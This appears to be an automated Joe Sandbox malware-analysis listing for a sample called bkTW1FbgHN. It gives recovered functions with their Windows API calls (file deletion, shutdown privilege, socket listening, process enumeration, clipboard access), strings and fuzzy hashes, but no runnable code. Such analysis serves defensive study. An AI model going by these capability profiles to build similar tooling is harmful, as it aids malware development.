NULL Pointer assignment, xrefs: 010084B3

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 7acbc7549005b40fa94c17448c8d9f7915523b1c7b7317057dbbad7c43e2706b
Instruction ID: c5955d10366c56a642df55483b5b4473af570e6d2d3ddacb12c83da6bf555730
Opcode Fuzzy Hash: 7acbc7549005b40fa94c17448c8d9f7915523b1c7b7317057dbbad7c43e2706b
Instruction Fuzzy Hash: 4361CF70A083119FE712DF18C848B5EBBE8BF45714F04845EF9C19B291CB75E948CB92

Function 01004164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0100418B
EmptyClipboard.USER32 ref: 01004191
GlobalAlloc.KERNEL32(00000002,?), ref: 010041A6
CloseClipboard.USER32 ref: 01004245

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: c67d9b1bc7819fc8187fcc46b5a6a41611c5d5dc66af3fc7cf66d3b77a934227
Instruction ID: 1f767bab4ed993789f946a4d55c7b059018fcf80de2e3cde8ff6090667a38904
Opcode Fuzzy Hash: c67d9b1bc7819fc8187fcc46b5a6a41611c5d5dc66af3fc7cf66d3b77a934227
Instruction Fuzzy Hash: B521B5353002119FEB21AF64DC09B6E7BA8FF49750F048019F9C5DB2A6DB7DA800CB54

Function 00FF37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F94750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F94743,?,?,00F937AE,?), ref: 00F94770

Part of subcall function 00FF4A31: GetFileAttributesW.KERNEL32(?,00FF370B), ref: 00FF4A32

FindFirstFileW.KERNEL32(?,?), ref: 00FF38A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00FF394B
MoveFileW.KERNEL32(?,?), ref: 00FF395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00FF397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00FF399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00FF39B9

Strings

\*.*, xrefs: 00FF384E, 00FF3857, 00FF386C

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 1bfd76763ecf03d00f5da0d336183459158d7ceed1739a71ceeeb51ff2693561
Instruction ID: a3c5cb83cfdf78a58a8cd8225d64c5fcf761fe3c34977bd74854daca7b88ea5d
Opcode Fuzzy Hash: 1bfd76763ecf03d00f5da0d336183459158d7ceed1739a71ceeeb51ff2693561
Instruction Fuzzy Hash: BF51AC31C0524DAADF11FBA0CD929FEB779AF10310F600069E402B71A1EB696F0DEB61

Function 00FFF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00FFF440
Sleep.KERNEL32(0000000A), ref: 00FFF470
_wcscmp.LIBCMT ref: 00FFF484
_wcscmp.LIBCMT ref: 00FFF49F
FindNextFileW.KERNEL32(?,?), ref: 00FFF53D
FindClose.KERNEL32(00000000), ref: 00FFF553

Strings

*.*, xrefs: 00FFF425

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: d6f2b6f36d3d489e64e2a9b79431cae2a0be4cf2b8fc1c5cdd899399f650ff63
Instruction ID: 75f13333284c7198772be2786c58ba5145ec30405e39d3dbb200a75777eb3eed
Opcode Fuzzy Hash: d6f2b6f36d3d489e64e2a9b79431cae2a0be4cf2b8fc1c5cdd899399f650ff63
Instruction Fuzzy Hash: 54417D71C0020E9BDF14EF64DC45AFEBBB4FF05320F184466E919A61A0EB349A48EF50

Function 00FA5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FA58A5
_memmove.LIBCMT ref: 00FA58F5
_memmove.LIBCMT ref: 00FA595B

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: e0f7c627a6972d194dc9b9803d628ad1c928f74f403d147279e6d960c1ab1025
Instruction ID: 2376763a8d21c3f4cafb2418d3ff770ac472f95c6d6366d8818025e2d4d3080c
Opcode Fuzzy Hash: e0f7c627a6972d194dc9b9803d628ad1c928f74f403d147279e6d960c1ab1025
Instruction Fuzzy Hash: 2D129CB0A00609DFDF14DFA6D981AEEB7F5FF48310F104529E846E7290EB39A951EB50

Function 00FF3B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F94750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F94743,?,?,00F937AE,?), ref: 00F94770

Part of subcall function 00FF4A31: GetFileAttributesW.KERNEL32(?,00FF370B), ref: 00FF4A32

FindFirstFileW.KERNEL32(?,?), ref: 00FF3B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 00FF3BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 00FF3BEA
FindClose.KERNEL32(00000000), ref: 00FF3C01
FindClose.KERNEL32(00000000), ref: 00FF3C0A

Strings

\*.*, xrefs: 00FF3B5B

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: bca4dae1a9cebd7048eb5a898bef853834ab7f7c821d51fdcbfa284a5f652dea
Instruction ID: 26454fc1718366e7535593dee88b0c8efe953525e4c3ac3a64f77f84bd8285ba
Opcode Fuzzy Hash: bca4dae1a9cebd7048eb5a898bef853834ab7f7c821d51fdcbfa284a5f652dea
Instruction Fuzzy Hash: D9319A314083899BD701FF64D8918BFB7E8AE91314F404E1DF5D5921A1EB29DA0DEBA3

Function 00FF51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00FE87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FE882B
Part of subcall function 00FE87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FE8858
Part of subcall function 00FE87E1: GetLastError.KERNEL32 ref: 00FE8865

ExitWindowsEx.USER32(?,00000000), ref: 00FF51F9

Strings

, xrefs: 00FF51E7
@, xrefs: 00FF51EC
SeShutdownPrivilege, xrefs: 00FF51C9

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 3481a99ff43ccfc438000b5133ba27bbd33032e78863fdf1be084613be301293
Instruction ID: f40e70551fc355214bea56ae437f8dac7a35eb4e8b35bbb2c685759a5a6f2690
Opcode Fuzzy Hash: 3481a99ff43ccfc438000b5133ba27bbd33032e78863fdf1be084613be301293
Instruction Fuzzy Hash: 0B017031B9161A5BF73861649C8AFB77258EF05B50F240664FB47E20E1DA551C056190

Function 01006283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 010062DC
WSAGetLastError.WSOCK32(00000000), ref: 010062EB
bind.WSOCK32(00000000,?,00000010), ref: 01006307
listen.WSOCK32(00000000,00000005), ref: 01006316
WSAGetLastError.WSOCK32(00000000), ref: 01006330
closesocket.WSOCK32(00000000,00000000), ref: 01006344

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 006fc466b4caa74e73cae7775cb3a66c25ba4638a58214139f9a9b6cf3240556
Instruction ID: c4793b1080a0f8563cb9b58d5c1cb8822296763d25ad93391c584513587c753c
Opcode Fuzzy Hash: 006fc466b4caa74e73cae7775cb3a66c25ba4638a58214139f9a9b6cf3240556
Instruction Fuzzy Hash: 2321DB302002059FEB10EF68C845A6EB7EAEF48320F14815DE896A72C1CB79AD05CB91

Function 00FA5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00FB0DB6: std::exception::exception.LIBCMT ref: 00FB0DEC
Part of subcall function 00FB0DB6: __CxxThrowException@8.LIBCMT ref: 00FB0E01

_memmove.LIBCMT ref: 00FE0258
_memmove.LIBCMT ref: 00FE036D
_memmove.LIBCMT ref: 00FE0414

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 0143584b7fbd5585f24e71e6aff2615e68ec81c2a45f6cf7be4364a9b9281ddf
Instruction ID: 5e56edb5ecf65cd8fe0c0eb9650229262d809b804b60103de0baa9aec80a9190
Opcode Fuzzy Hash: 0143584b7fbd5585f24e71e6aff2615e68ec81c2a45f6cf7be4364a9b9281ddf
Instruction Fuzzy Hash: 6102DFB0E00209DFDF04DF65D981AAEBBB5EF44310F148069E80ADB295EF79D950EB90

Function 00F91287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00F92612: GetWindowLongW.USER32(?,000000EB), ref: 00F92623

DefDlgProcW.USER32(?,?,?,?,?), ref: 00F919FA
GetSysColor.USER32(0000000F), ref: 00F91A4E
SetBkColor.GDI32(?,00000000), ref: 00F91A61

Part of subcall function 00F91290: DefDlgProcW.USER32(?,00000020,?), ref: 00F912D8

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 55e7008be0786ff7b076e034aeba10801ed15d1d69c71e495696b191dc8834d3
Instruction ID: c4149c8c27a18a75178ca9f8418c26dcec5b685ebb8121d87c8729dd65ca4faf
Opcode Fuzzy Hash: 55e7008be0786ff7b076e034aeba10801ed15d1d69c71e495696b191dc8834d3
Instruction Fuzzy Hash: A2A15472502547BAFF38AA298D4AFBB355DFB42361F10012EF582D2185CA2D9D01F7B2

Function 00FFBCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00FFBCE6
_wcscmp.LIBCMT ref: 00FFBD16
_wcscmp.LIBCMT ref: 00FFBD2B
FindNextFileW.KERNEL32(00000000,?), ref: 00FFBD3C
FindClose.KERNEL32(00000000,00000001,00000000), ref: 00FFBD6C

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 3419983a3154859b550f712d007fdf3b954528e59c069c0ec805227315547594
Instruction ID: 2a3dba66cb84c59af37eec3d5b7d379fa1f87a62cd93ec0411a069535d17a08f
Opcode Fuzzy Hash: 3419983a3154859b550f712d007fdf3b954528e59c069c0ec805227315547594
Instruction Fuzzy Hash: 91518D35A047069FDB14DF68C890EAAB3E4EF49320F14461DEA56873A1DB34ED04DB92

Function 01006747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 01007D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 01007DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0100679E
WSAGetLastError.WSOCK32(00000000), ref: 010067C7
bind.WSOCK32(00000000,?,00000010), ref: 01006800
WSAGetLastError.WSOCK32(00000000), ref: 0100680D
closesocket.WSOCK32(00000000,00000000), ref: 01006821

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 5d06675792205bf988324d106f08d7ec025c7e86b46c1050682f122e72a3467d
Instruction ID: 3ebe2102b202ec0317c54c344d18399a131e493d6d34186788a88e5e8cca51bb
Opcode Fuzzy Hash: 5d06675792205bf988324d106f08d7ec025c7e86b46c1050682f122e72a3467d
Instruction Fuzzy Hash: D441F071A00210AFEF11AF288C82F3E77E8EB45750F45805CF959AB3C2DAB99D019791

Function 01015376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 010153C5
IsWindowEnabled.USER32 ref: 010153D3
GetForegroundWindow.USER32(?,?,00000001), ref: 010153E0
IsIconic.USER32 ref: 010153EE
IsZoomed.USER32 ref: 010153FC

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: c168989f8f93e6b406fa77b1433891295ea94d3201d771f665dafdf9dde59875
Instruction ID: 10465b05e6f030634ea236345a19f61b5f45dcdbb0e1df4e37afda64013e8918
Opcode Fuzzy Hash: c168989f8f93e6b406fa77b1433891295ea94d3201d771f665dafdf9dde59875
Instruction Fuzzy Hash: 591101313005116FEB216F2ADC44A6EBBD8FFC6360F408428F9C6DB245CBBCD8018AA0

Function 00FE80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FE80C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FE80CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FE80D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FE80E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FE80F6

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: f42dd4e3b036155c685e18bd34b62933ad07a71041aa6c3692d55d61af03d583
Instruction ID: 1bc7b0546a1b7f148c52e27b4ee79c91e659ddca96a8583d015acf98daefd846
Opcode Fuzzy Hash: f42dd4e3b036155c685e18bd34b62933ad07a71041aa6c3692d55d61af03d583
Instruction Fuzzy Hash: 5EF0C870240205AFD7215F65DC8CE673BADEF457A4B000015F549C2150CB699D06DB60

Function 00F94B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00F94AD0), ref: 00F94B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F94B57

Strings

GetNativeSystemInfo, xrefs: 00F94B51
kernel32.dll, xrefs: 00F94B40

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: f4e066b656d3da854198417feacfaa6098e5119c40a993578af889967054cd65
Instruction ID: 62ca0c003cec8d2423346201cb0228d6ce4277cb7d9b88c2619abe660d2a01fe
Opcode Fuzzy Hash: f4e066b656d3da854198417feacfaa6098e5119c40a993578af889967054cd65
Instruction Fuzzy Hash: 41D01234E10713CFDB209F32E868B0676E4BF55265B11882D94C5D6108D67CE884C754

Function 00FA3030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: f02a9d4a2a2de32a3d1478893cb220733746c7fb58595529dc39d4330a89385c
Instruction ID: dbbfd7505421dab3f8107087baf64ceea5cd85b5c66fe164fc8f188195ddcd99
Opcode Fuzzy Hash: f02a9d4a2a2de32a3d1478893cb220733746c7fb58595529dc39d4330a89385c
Instruction Fuzzy Hash: B422BDB1A083009FDB24DF24C881B6FB7E5AF89710F14491DF89A97391DB75E904EB92

Function 0100EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0100EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 0100EE4B

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

Process32NextW.KERNEL32(00000000,?), ref: 0100EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0100EF1A

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 76192b876220b3c459a2789629d9c57964226cb4e2af8995ec194aa40dafcdea
Instruction ID: cf5e203b69f4fe74b12e1da49506dc55553837a079548f379aad21a3c60069a5
Opcode Fuzzy Hash: 76192b876220b3c459a2789629d9c57964226cb4e2af8995ec194aa40dafcdea
Instruction Fuzzy Hash: 4B51A171508701AFE721EF24CC81E6BB7E8EF95710F40482DF595972A1EB74E908CB92

Function 00FEE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00FEE628

Strings

|, xrefs: 00FEE658
(, xrefs: 00FEE66E

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
